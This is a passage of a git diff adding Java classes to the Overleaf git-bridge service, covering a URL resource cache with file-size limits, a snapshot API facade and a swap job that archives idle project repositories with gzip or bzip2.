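+ *       cache.get(projectName, url, newPath, fileTable, fetchedUrls, Optional.empty());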
+ */ +public interface ResourceCache { + + RawFile get( + String projectName, + String url, + String newPath, + Map<String, RawFile> fileTable, + Map<String, byte[]> fetchedUrls, + Optional<Long> maxFileSize) + throws IOException, SizeLimitExceededException; +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/resource/UrlResourceCache.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/resource/UrlResourceCache.java new file mode 100644 index 0000000..d01027d --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/resource/UrlResourceCache.java @@ -0,0 +1,139 @@ +package uk.ac.ic.wlgitbridge.bridge.resource; + +import static org.asynchttpclient.Dsl.*; + +import java.io.IOException; +import java.util.List; +import java.util.Map; +import java.util.Optional; +import java.util.concurrent.ExecutionException; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; +import uk.ac.ic.wlgitbridge.data.filestore.RepositoryFile; +import uk.ac.ic.wlgitbridge.git.exception.SizeLimitExceededException; +import uk.ac.ic.wlgitbridge.io.http.ning.NingHttpClient; +import uk.ac.ic.wlgitbridge.io.http.ning.NingHttpClientFacade; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by winston on 20/08/2016. + */ +public class UrlResourceCache implements ResourceCache { + + private final DBStore dbStore; + + private final NingHttpClientFacade http; + + UrlResourceCache(DBStore dbStore, NingHttpClientFacade http) { + this.dbStore = dbStore; + this.http = http; + } + + public UrlResourceCache(DBStore dbStore) { + this(dbStore, new NingHttpClient(asyncHttpClient())); + } + + @Override + public RawFile get( + String projectName, + String url, + String newPath, + Map<String, RawFile> fileTable, + Map<String, byte[]> fetchedUrls, + Optional<Long> maxFileSize) + throws IOException, SizeLimitExceededException { + String path = dbStore.getPathForURLInProject(projectName, getCacheKeyFromUrl(url)); + byte[] contents; + if (path == null) { + path = newPath; + contents = fetch(projectName, url, path, maxFileSize); + fetchedUrls.put(url, contents); + } else { + Log.debug("Found (" + projectName + "): " + url); + Log.debug("At (" + projectName + "): " + path); + contents = fetchedUrls.get(url); + if (contents == null) { + RawFile rawFile = fileTable.get(path); + if (rawFile == null) { + Log.warn( + "File " + + path + + " was not in the current commit, " + + "or the git tree, yet path was not null. 
" + + "File url is: " + + url); + contents = fetch(projectName, url, path, maxFileSize); + } else { + contents = rawFile.getContents(); + } + } + } + return new RepositoryFile(newPath, contents); + } + + private byte[] fetch( + String projectName, final String url, String path, Optional<Long> maxFileSize) + throws FailedConnectionException, SizeLimitExceededException { + byte[] contents; + Log.debug("GET -> " + url); + try { + contents = + http.get( + url, + hs -> { + List<String> contentLengths = hs.getAll("Content-Length"); + if (!maxFileSize.isPresent()) { + return true; + } + if (contentLengths.isEmpty()) { + return true; + } + long contentLength = Long.parseLong(contentLengths.get(0)); + long maxFileSize_ = maxFileSize.get(); + if (contentLength <= maxFileSize_) { + return true; + } + throw new SizeLimitExceededException( + Optional.of(path), contentLength, maxFileSize_); + }); + } catch (ExecutionException e) { + Throwable cause = e.getCause(); + if (cause instanceof SizeLimitExceededException) { + throw (SizeLimitExceededException) cause; + } + Log.warn( + "ExecutionException when fetching project: " + + projectName + + ", url: " + + url + + ", path: " + + path, + e); + throw new FailedConnectionException(); + } + if (maxFileSize.isPresent() && contents.length > maxFileSize.get()) { + throw new SizeLimitExceededException(Optional.of(path), contents.length, maxFileSize.get()); + } + dbStore.addURLIndexForProject(projectName, getCacheKeyFromUrl(url), path); + return contents; + } + + /* + * Construct a suitable cache key from the given file URL. + * + * The file URL returned by the web service may contain a token parameter + * used for authentication. This token changes for every request, so we + * need to strip it from the query string before using the URL as a cache + * key. + */ + private String getCacheKeyFromUrl(String url) { + // We're not doing proper URL parsing here, but it should be enough to + // remove the token without touching the important parts of the URL. + // + // The URL looks like: + // + // https://history.overleaf.com/api/projects/:project_id/blobs/:hash?token=:token&_path=:path + return url.replaceAll("token=[^&]*", "token=REMOVED"); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/NetSnapshotApi.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/NetSnapshotApi.java new file mode 100644 index 0000000..b8f2636 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/NetSnapshotApi.java @@ -0,0 +1,47 @@ +package uk.ac.ic.wlgitbridge.bridge.snapshot; + +import com.google.api.client.auth.oauth2.Credential; +import java.util.Optional; +import java.util.concurrent.CompletableFuture; +import uk.ac.ic.wlgitbridge.data.CandidateSnapshot; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocRequest; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.GetForVersionRequest; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.GetForVersionResult; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.GetSavedVersRequest; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.GetSavedVersResult; +import uk.ac.ic.wlgitbridge.snapshot.push.PushRequest; +import uk.ac.ic.wlgitbridge.snapshot.push.PushResult; + +/* + * Created by winston on 20/08/2016. 
+ */ +public class NetSnapshotApi implements SnapshotApi { + + @Override + public CompletableFuture<GetDocResult> getDoc(Optional<Credential> oauth2, String projectName) { + return new GetDocRequest(opt(oauth2), projectName).request(); + } + + @Override + public CompletableFuture<GetForVersionResult> getForVersion( + Optional<Credential> oauth2, String projectName, int versionId) { + return new GetForVersionRequest(opt(oauth2), projectName, versionId).request(); + } + + @Override + public CompletableFuture<GetSavedVersResult> getSavedVers( + Optional<Credential> oauth2, String projectName) { + return new GetSavedVersRequest(opt(oauth2), projectName).request(); + } + + @Override + public CompletableFuture<PushResult> push( + Optional<Credential> oauth2, CandidateSnapshot candidateSnapshot, String postbackKey) { + return new PushRequest(opt(oauth2), candidateSnapshot, postbackKey).request(); + } + + private static Credential opt(Optional<Credential> oauth2) { + return oauth2.orElse(null); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/SnapshotApi.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/SnapshotApi.java new file mode 100644 index 0000000..67fec43 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/SnapshotApi.java @@ -0,0 +1,49 @@ +package uk.ac.ic.wlgitbridge.bridge.snapshot; + +import com.google.api.client.auth.oauth2.Credential; +import java.util.Optional; +import java.util.concurrent.CompletableFuture; +import java.util.concurrent.CompletionException; +import uk.ac.ic.wlgitbridge.data.CandidateSnapshot; +import uk.ac.ic.wlgitbridge.snapshot.base.ForbiddenException; +import uk.ac.ic.wlgitbridge.snapshot.base.MissingRepositoryException; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.GetForVersionResult; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.GetSavedVersResult; +import uk.ac.ic.wlgitbridge.snapshot.push.PushResult; + +/* + * Created by winston on 20/08/2016. 
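+ *
+ * Illustrative use of getResult to unwrap the checked exceptions from the
+ * CompletableFuture (annotation, not part of the original comment):
+ *
+ *   GetDocResult doc = SnapshotApi.getResult(api.getDoc(oauth2, projectName));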
+ */ +public interface SnapshotApi { + + CompletableFuture<GetDocResult> getDoc(Optional<Credential> oauth2, String projectName); + + CompletableFuture<GetForVersionResult> getForVersion( + Optional<Credential> oauth2, String projectName, int versionId); + + CompletableFuture<GetSavedVersResult> getSavedVers( + Optional<Credential> oauth2, String projectName); + + CompletableFuture<PushResult> push( + Optional<Credential> oauth2, CandidateSnapshot candidateSnapshot, String postbackKey); + + static <T> T getResult(CompletableFuture<T> result) + throws MissingRepositoryException, FailedConnectionException, ForbiddenException { + try { + return result.join(); + } catch (CompletionException e) { + try { + throw e.getCause(); + } catch (MissingRepositoryException + | FailedConnectionException + | ForbiddenException + | RuntimeException r) { + throw r; + } catch (Throwable __) { + throw e; + } + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/SnapshotApiFacade.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/SnapshotApiFacade.java new file mode 100644 index 0000000..07ac0a9 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/SnapshotApiFacade.java @@ -0,0 +1,121 @@ +package uk.ac.ic.wlgitbridge.bridge.snapshot; + +import com.google.api.client.auth.oauth2.Credential; +import java.util.*; +import java.util.concurrent.CompletableFuture; +import java.util.stream.Collectors; +import uk.ac.ic.wlgitbridge.data.CandidateSnapshot; +import uk.ac.ic.wlgitbridge.data.model.Snapshot; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; +import uk.ac.ic.wlgitbridge.snapshot.base.ForbiddenException; +import uk.ac.ic.wlgitbridge.snapshot.base.MissingRepositoryException; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.GetForVersionResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotData; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.GetSavedVersResult; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.SnapshotInfo; +import uk.ac.ic.wlgitbridge.snapshot.push.PushResult; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.InvalidProjectException; + +/* + * Created by winston on 02/07/2017. 
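+ *
+ * Sketch of typical use (annotation, not part of the original comment;
+ * `oauth2` and `lastVersionId` are assumed to come from the caller):
+ *
+ *   SnapshotApiFacade facade = new SnapshotApiFacade(new NetSnapshotApi());
+ *   if (facade.projectExists(oauth2, "abc123")) {
+ *     Deque<Snapshot> snapshots = facade.getSnapshots(oauth2, "abc123", lastVersionId);
+ *   }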
+ */ +public class SnapshotApiFacade { + + private final SnapshotApi api; + + public SnapshotApiFacade(SnapshotApi api) { + this.api = api; + } + + public boolean projectExists(Optional<Credential> oauth2, String projectName) + throws FailedConnectionException, GitUserException { + try { + SnapshotApi.getResult(api.getDoc(oauth2, projectName)).getVersionID(); + return true; + } catch (InvalidProjectException e) { + return false; + } + } + + public Optional<GetDocResult> getDoc(Optional<Credential> oauth2, String projectName) + throws FailedConnectionException, GitUserException { + try { + GetDocResult doc = SnapshotApi.getResult(api.getDoc(oauth2, projectName)); + doc.getVersionID(); + return Optional.of(doc); + } catch (InvalidProjectException e) { + return Optional.empty(); + } + } + + public Deque<Snapshot> getSnapshots( + Optional<Credential> oauth2, String projectName, int afterVersionId) + throws GitUserException, FailedConnectionException { + List<SnapshotInfo> snapshotInfos = + getSnapshotInfosAfterVersion(oauth2, projectName, afterVersionId); + List<SnapshotData> snapshotDatas = getMatchingSnapshotData(oauth2, projectName, snapshotInfos); + return combine(snapshotInfos, snapshotDatas); + } + + public PushResult push( + Optional<Credential> oauth2, CandidateSnapshot candidateSnapshot, String postbackKey) + throws MissingRepositoryException, FailedConnectionException, ForbiddenException { + return SnapshotApi.getResult(api.push(oauth2, candidateSnapshot, postbackKey)); + } + + private List<SnapshotInfo> getSnapshotInfosAfterVersion( + Optional<Credential> oauth2, String projectName, int version) + throws FailedConnectionException, GitUserException { + SortedSet<SnapshotInfo> versions = new TreeSet<>(); + CompletableFuture<GetDocResult> getDoc = api.getDoc(oauth2, projectName); + CompletableFuture<GetSavedVersResult> savedVers = api.getSavedVers(oauth2, projectName); + GetDocResult latestDoc = SnapshotApi.getResult(getDoc); + int latest = latestDoc.getVersionID(); + // Handle edge-case for projects with no changes, that were imported + // to v2. In which case both `latest` and `version` will be zero. 
+ // See: https://github.com/overleaf/writelatex-git-bridge/pull/50 + if (latest > version || (latest == 0 && version == 0)) { + for (SnapshotInfo snapshotInfo : SnapshotApi.getResult(savedVers).getSavedVers()) { + if (snapshotInfo.getVersionId() > version) { + versions.add(snapshotInfo); + } + } + versions.add( + new SnapshotInfo( + latest, latestDoc.getCreatedAt(), latestDoc.getName(), latestDoc.getEmail())); + } + return new ArrayList<>(versions); + } + + private List<SnapshotData> getMatchingSnapshotData( + Optional<Credential> oauth2, String projectName, List<SnapshotInfo> snapshotInfos) + throws FailedConnectionException, ForbiddenException { + List<CompletableFuture<GetForVersionResult>> firedRequests = + fireDataRequests(oauth2, projectName, snapshotInfos); + List<SnapshotData> snapshotDataList = new ArrayList<>(); + for (CompletableFuture<GetForVersionResult> fired : firedRequests) { + snapshotDataList.add(fired.join().getSnapshotData()); + } + return snapshotDataList; + } + + private List<CompletableFuture<GetForVersionResult>> fireDataRequests( + Optional<Credential> oauth2, String projectName, List<SnapshotInfo> snapshotInfos) { + return snapshotInfos.stream() + .map(snap -> api.getForVersion(oauth2, projectName, snap.getVersionId())) + .collect(Collectors.toList()); + } + + private static Deque<Snapshot> combine( + List<SnapshotInfo> snapshotInfos, List<SnapshotData> snapshotDatas) { + Deque<Snapshot> snapshots = new LinkedList<>(); + Iterator<SnapshotInfo> infos = snapshotInfos.iterator(); + Iterator<SnapshotData> datas = snapshotDatas.iterator(); + while (infos.hasNext()) { + snapshots.add(new Snapshot(infos.next(), datas.next())); + } + return snapshots; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/NoopSwapJob.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/NoopSwapJob.java new file mode 100644 index 0000000..977734a --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/NoopSwapJob.java @@ -0,0 +1,19 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.job; + +/* + * Created by winston on 24/08/2016. + */ +public class NoopSwapJob implements SwapJob { + + @Override + public void start() {} + + @Override + public void stop() {} + + @Override + public void evict(String projName) {} + + @Override + public void restore(String projName) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJob.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJob.java new file mode 100644 index 0000000..8afaf17 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJob.java @@ -0,0 +1,124 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.job; + +import java.io.IOException; +import java.util.Optional; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.lock.ProjectLock; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.bridge.swap.store.SwapStore; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by winston on 20/08/2016. 
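+ *
+ * Wiring sketch (annotation, not part of the original comment; presumably run
+ * once at startup):
+ *
+ *   SwapJob swapJob = SwapJob.fromConfig(cfg, lock, repoStore, dbStore, swapStore);
+ *   swapJob.start();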
+ */
+public interface SwapJob {
+
+  enum CompressionMethod {
+    Bzip2,
+    Gzip
+  }
+
+  static CompressionMethod stringToCompressionMethod(String compressionString) {
+    if (compressionString == null) {
+      return null;
+    }
+    CompressionMethod result;
+    switch (compressionString) {
+      case "gzip":
+        result = CompressionMethod.Gzip;
+        break;
+      case "bzip2":
+        result = CompressionMethod.Bzip2;
+        break;
+      default:
+        result = null;
+        break;
+    }
+    return result;
+  }
+
+  static String compressionMethodAsString(CompressionMethod compressionMethod) {
+    if (compressionMethod == null) {
+      return null;
+    }
+    String result;
+    switch (compressionMethod) {
+      case Gzip:
+        result = "gzip";
+        break;
+      case Bzip2:
+        result = "bzip2";
+        break;
+      default:
+        result = null;
+        break;
+    }
+    return result;
+  }
+
+  static SwapJob fromConfig(
+      Optional<SwapJobConfig> cfg,
+      ProjectLock lock,
+      RepoStore repoStore,
+      DBStore dbStore,
+      SwapStore swapStore) {
+    if (!cfg.isPresent()) {
+      return new NoopSwapJob();
+    }
+    if (!swapStore.isSafe() && !cfg.get().getAllowUnsafeStores()) {
+      Log.warn(
+          "Swap store '{}' is not safe; disabling swap job", swapStore.getClass().getSimpleName());
+      return new NoopSwapJob();
+    }
+    return new SwapJobImpl(cfg.get(), lock, repoStore, dbStore, swapStore);
+  }
+
+  /*
+   * Starts the swap job, which should schedule an attempted swap at the
+   * configured interval (config["swapJob"]["intervalMillis"]).
+   */
+  void start();
+
+  /*
+   * Stops the swap job.
+   */
+  void stop();
+
+  /*
+   * Called by the swap job when a project should be evicted.
+   *
+   * Pre:
+   * 1. projName must be in repoStore
+   * 2. projName should not be in swapStore
+   * 3. projName should be PRESENT in dbStore (last_accessed is not null)
+   *
+   * Acquires the project lock and performs an eviction of projName.
+   *
+   * Post:
+   * 1. projName should not be in repoStore
+   * 2. projName must be in swapStore
+   * 3. projName must be SWAPPED in dbStore (last_accessed is null)
+   * @param projName
+   * @throws IOException
+   */
+  void evict(String projName) throws IOException;
+
+  /*
+   * Called on a project when it must be restored.
+   *
+   * Pre:
+   * 1. projName should not be in repoStore
+   * 2. projName must be in swapStore
+   * 3. projName must be SWAPPED in dbStore (last_accessed is null)
+   *
+   * Acquires the project lock and restores projName.
+   *
+   * Post:
+   * 1. projName must be in repoStore
+   * 2. projName should not be in swapStore
+   * 3. projName should be PRESENT in dbStore (last_accessed is not null)
+   * @param projName
+   * @throws IOException
+   */
+  void restore(String projName) throws IOException;
+}
diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobConfig.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobConfig.java
new file mode 100644
index 0000000..369bf5c
--- /dev/null
+++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobConfig.java
@@ -0,0 +1,63 @@
+package uk.ac.ic.wlgitbridge.bridge.swap.job;
+
+import uk.ac.ic.wlgitbridge.bridge.swap.job.SwapJob.CompressionMethod;
+import uk.ac.ic.wlgitbridge.util.Log;
+
+/*
+ * Created by winston on 23/08/2016.
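+ *
+ * Construction sketch (annotation, not part of the original comment; the
+ * values are arbitrary examples): keep at least 50 projects on disk, start
+ * evicting above 256 GiB until back under 128 GiB, and check hourly:
+ *
+ *   new SwapJobConfig(50, 128, 256, 3_600_000L, "bzip2", false);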
+ */
+public class SwapJobConfig {
+
+  private final int minProjects;
+  private final int lowGiB;
+  private final int highGiB;
+  private final long intervalMillis;
+  private final String compressionMethod;
+  private final boolean allowUnsafeStores;
+
+  public SwapJobConfig(
+      int minProjects,
+      int lowGiB,
+      int highGiB,
+      long intervalMillis,
+      String compressionMethod,
+      boolean allowUnsafeStores) {
+    this.minProjects = minProjects;
+    this.lowGiB = lowGiB;
+    this.highGiB = highGiB;
+    this.intervalMillis = intervalMillis;
+    this.compressionMethod = compressionMethod;
+    this.allowUnsafeStores = allowUnsafeStores;
+  }
+
+  public int getMinProjects() {
+    return minProjects;
+  }
+
+  public int getLowGiB() {
+    return lowGiB;
+  }
+
+  public int getHighGiB() {
+    return highGiB;
+  }
+
+  public long getIntervalMillis() {
+    return intervalMillis;
+  }
+
+  public boolean getAllowUnsafeStores() {
+    return allowUnsafeStores;
+  }
+
+  public SwapJob.CompressionMethod getCompressionMethod() {
+    CompressionMethod result = SwapJob.stringToCompressionMethod(compressionMethod);
+    if (result == null) {
+      Log.info(
+          "SwapJobConfig: unsupported compressionMethod '{}', defaulting to 'bzip2'",
+          compressionMethod);
+      result = CompressionMethod.Bzip2;
+    }
+    return result;
+  }
+}
diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobImpl.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobImpl.java
new file mode 100644
index 0000000..7101f8a
--- /dev/null
+++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobImpl.java
@@ -0,0 +1,245 @@
+package uk.ac.ic.wlgitbridge.bridge.swap.job;
+
+import com.google.api.client.repackaged.com.google.common.base.Preconditions;
+import java.io.IOException;
+import java.io.InputStream;
+import java.sql.Timestamp;
+import java.time.Duration;
+import java.time.LocalDateTime;
+import java.util.ArrayList;
+import java.util.Timer;
+import java.util.concurrent.atomic.AtomicInteger;
+import uk.ac.ic.wlgitbridge.bridge.db.DBStore;
+import uk.ac.ic.wlgitbridge.bridge.lock.LockGuard;
+import uk.ac.ic.wlgitbridge.bridge.lock.ProjectLock;
+import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore;
+import uk.ac.ic.wlgitbridge.bridge.swap.store.SwapStore;
+import uk.ac.ic.wlgitbridge.data.CannotAcquireLockException;
+import uk.ac.ic.wlgitbridge.util.Log;
+import uk.ac.ic.wlgitbridge.util.TimerUtils;
+
+/*
+ * Created by winston on 20/08/2016.
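+ *
+ * Note (annotation, not part of the original comment): the low/high GiB
+ * settings are converted to bytes using GiB = 1L << 30, so e.g. lowGiB = 128
+ * gives lowWatermarkBytes = 128L << 30 = 137,438,953,472 bytes.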
+ */ +public class SwapJobImpl implements SwapJob { + + private static final long GiB = (1l << 30); + + int minProjects; + long lowWatermarkBytes; + long highWatermarkBytes; + Duration interval; + + private final ProjectLock lock; + private final RepoStore repoStore; + private final DBStore dbStore; + private final SwapStore swapStore; + private final CompressionMethod compressionMethod; + + private final Timer timer; + + final AtomicInteger swaps; + + public SwapJobImpl( + SwapJobConfig cfg, + ProjectLock lock, + RepoStore repoStore, + DBStore dbStore, + SwapStore swapStore) { + this( + cfg.getMinProjects(), + GiB * cfg.getLowGiB(), + GiB * cfg.getHighGiB(), + Duration.ofMillis(cfg.getIntervalMillis()), + cfg.getCompressionMethod(), + lock, + repoStore, + dbStore, + swapStore); + } + + SwapJobImpl( + int minProjects, + long lowWatermarkBytes, + long highWatermarkBytes, + Duration interval, + CompressionMethod method, + ProjectLock lock, + RepoStore repoStore, + DBStore dbStore, + SwapStore swapStore) { + this.minProjects = minProjects; + this.lowWatermarkBytes = lowWatermarkBytes; + this.highWatermarkBytes = highWatermarkBytes; + this.interval = interval; + this.compressionMethod = method; + this.lock = lock; + this.repoStore = repoStore; + this.dbStore = dbStore; + this.swapStore = swapStore; + timer = new Timer(); + swaps = new AtomicInteger(0); + } + + @Override + public void start() { + timer.schedule(TimerUtils.makeTimerTask(this::doSwap), 0); + } + + @Override + public void stop() { + timer.cancel(); + } + + private void doSwap() { + try { + doSwap_(); + } catch (Throwable t) { + Log.warn("Exception thrown during swap job", t); + } + timer.schedule(TimerUtils.makeTimerTask(this::doSwap), interval.toMillis()); + } + + private void doSwap_() { + ArrayList<String> exceptionProjectNames = new ArrayList<String>(); + + Log.debug("Running swap number {}", swaps.get() + 1); + long totalSize = repoStore.totalSize(); + Log.debug("Size is {}/{} (high)", totalSize, highWatermarkBytes); + if (totalSize < highWatermarkBytes) { + Log.debug("No need to swap."); + swaps.incrementAndGet(); + return; + } + int numProjects = dbStore.getNumProjects(); + // while we have too many projects on disk + while ((totalSize = repoStore.totalSize()) > lowWatermarkBytes + && (numProjects = dbStore.getNumUnswappedProjects()) > minProjects) { + // check if we've had too many exceptions so far + if (exceptionProjectNames.size() >= 20) { + StringBuilder sb = new StringBuilder(); + for (String s : exceptionProjectNames) { + sb.append(s); + sb.append(' '); + } + Log.error( + "Too many exceptions while running swap, giving up on this run: {}", sb.toString()); + break; + } + // get the oldest project and try to swap it + String projectName = dbStore.getOldestUnswappedProject(); + try { + evict(projectName); + } catch (Exception e) { + Log.warn("[{}] Exception while swapping, mark project and move on", projectName, e); + // NOTE: this is something of a hack. If a project fails to swap we get stuck in a + // loop where `dbStore.getOldestUnswappedProject()` gives the same failing project over and + // over again, + // which fills up the disk with errors. By touching the access time we can mark the project + // as a + // non-candidate for swapping. 
Ideally we should be checking the logs for these log events + // and fixing + // whatever is wrong with the project + dbStore.setLastAccessedTime(projectName, Timestamp.valueOf(LocalDateTime.now())); + exceptionProjectNames.add(projectName); + } + } + if (totalSize > lowWatermarkBytes) { + Log.warn("Finished swapping, but total size is still too high."); + } + Log.debug( + "Size: {}/{} (low), " + + "{} (high), " + + "projects on disk: {}/{}, " + + "min projects on disk: {}", + totalSize, + lowWatermarkBytes, + highWatermarkBytes, + numProjects, + dbStore.getNumProjects(), + minProjects); + swaps.incrementAndGet(); + } + + /* + * @see SwapJob#evict(String) for high-level description. + * + * 1. Acquires the project lock. + * 2. Gets a bz2 stream and size of a project from the repo store, or throws + * 3. Uploads the bz2 stream and size to the projName in the swapStore. + * 4. Sets the last accessed time in the dbStore to null, which makes our + * state SWAPPED + * 5. Removes the project from the repo store. + * @param projName + * @throws IOException + */ + @Override + public void evict(String projName) throws IOException { + Preconditions.checkNotNull(projName, "projName was null"); + Log.info("Evicting project: {}", projName); + try (LockGuard __ = lock.lockGuard(projName)) { + try { + repoStore.gcProject(projName); + } catch (Exception e) { + Log.error("[{}] Exception while running gc on project: {}", projName, e); + } + long[] sizePtr = new long[1]; + try (InputStream blob = getBlobStream(projName, sizePtr)) { + swapStore.upload(projName, blob, sizePtr[0]); + String compression = SwapJob.compressionMethodAsString(compressionMethod); + if (compression == null) { + throw new RuntimeException("invalid compression method, should not happen"); + } + dbStore.swap(projName, compression); + repoStore.remove(projName); + } + } catch (CannotAcquireLockException e) { + Log.warn("[{}] Cannot acquire project lock, skipping swap", projName); + return; + } + Log.info("Evicted project: {}", projName); + } + + private InputStream getBlobStream(String projName, long[] sizePtr) throws IOException { + if (compressionMethod == CompressionMethod.Gzip) { + return repoStore.gzipProject(projName, sizePtr); + } else if (compressionMethod == CompressionMethod.Bzip2) { + return repoStore.bzip2Project(projName, sizePtr); + } else { + throw new RuntimeException("invalid compression method, should not happen"); + } + } + + /* + * @see SwapJob#restore(String) for high-level description. + * + * 1. Acquires the project lock. + * 2. Gets a bz2 stream for the project from the swapStore. + * 3. Fully downloads and places the bz2 stream back in the repo store. + * 4. Sets the last accessed time in the dbStore to now, which makes our + * state PRESENT and the last project to be evicted. 
+ * @param projName + * @throws IOException + */ + @Override + public void restore(String projName) throws IOException { + try (LockGuard __ = lock.lockGuard(projName)) { + try (InputStream zipped = swapStore.openDownloadStream(projName)) { + String compression = dbStore.getSwapCompression(projName); + if (compression == null) { + throw new RuntimeException( + "Missing compression method during restore, should not happen"); + } + if ("gzip".equals(compression)) { + repoStore.ungzipProject(projName, zipped); + } else if ("bzip2".equals(compression)) { + repoStore.unbzip2Project(projName, zipped); + } + swapStore.remove(projName); + dbStore.restore(projName); + } + } catch (CannotAcquireLockException e) { + throw new RuntimeException(e); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/InMemorySwapStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/InMemorySwapStore.java new file mode 100644 index 0000000..3c7ae01 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/InMemorySwapStore.java @@ -0,0 +1,49 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.store; + +import java.io.ByteArrayInputStream; +import java.io.IOException; +import java.io.InputStream; +import java.util.HashMap; +import java.util.Map; +import org.apache.commons.io.IOUtils; + +/* + * Created by winston on 23/08/2016. + */ +public class InMemorySwapStore implements SwapStore { + + private final Map<String, byte[]> store; + + public InMemorySwapStore() { + store = new HashMap<>(); + } + + public InMemorySwapStore(SwapStoreConfig __) { + this(); + } + + @Override + public void upload(String projectName, InputStream uploadStream, long contentLength) + throws IOException { + store.put(projectName, IOUtils.toByteArray(uploadStream, contentLength)); + } + + @Override + public InputStream openDownloadStream(String projectName) { + byte[] buf = store.get(projectName); + if (buf == null) { + throw new IllegalArgumentException("no such project in swap store: " + projectName); + } + return new ByteArrayInputStream(buf); + } + + @Override + public void remove(String projectName) { + store.remove(projectName); + } + + @Override + public boolean isSafe() { + return false; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/NoopSwapStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/NoopSwapStore.java new file mode 100644 index 0000000..b607b48 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/NoopSwapStore.java @@ -0,0 +1,28 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.store; + +import java.io.ByteArrayInputStream; +import java.io.InputStream; + +/* + * Created by winston on 24/08/2016. 
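+ *
+ * (Annotation, not part of the original comment.) This store discards uploads
+ * and serves empty downloads; since isSafe() is false, SwapJob.fromConfig will
+ * refuse to enable swapping against it unless allowUnsafeStores is set.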
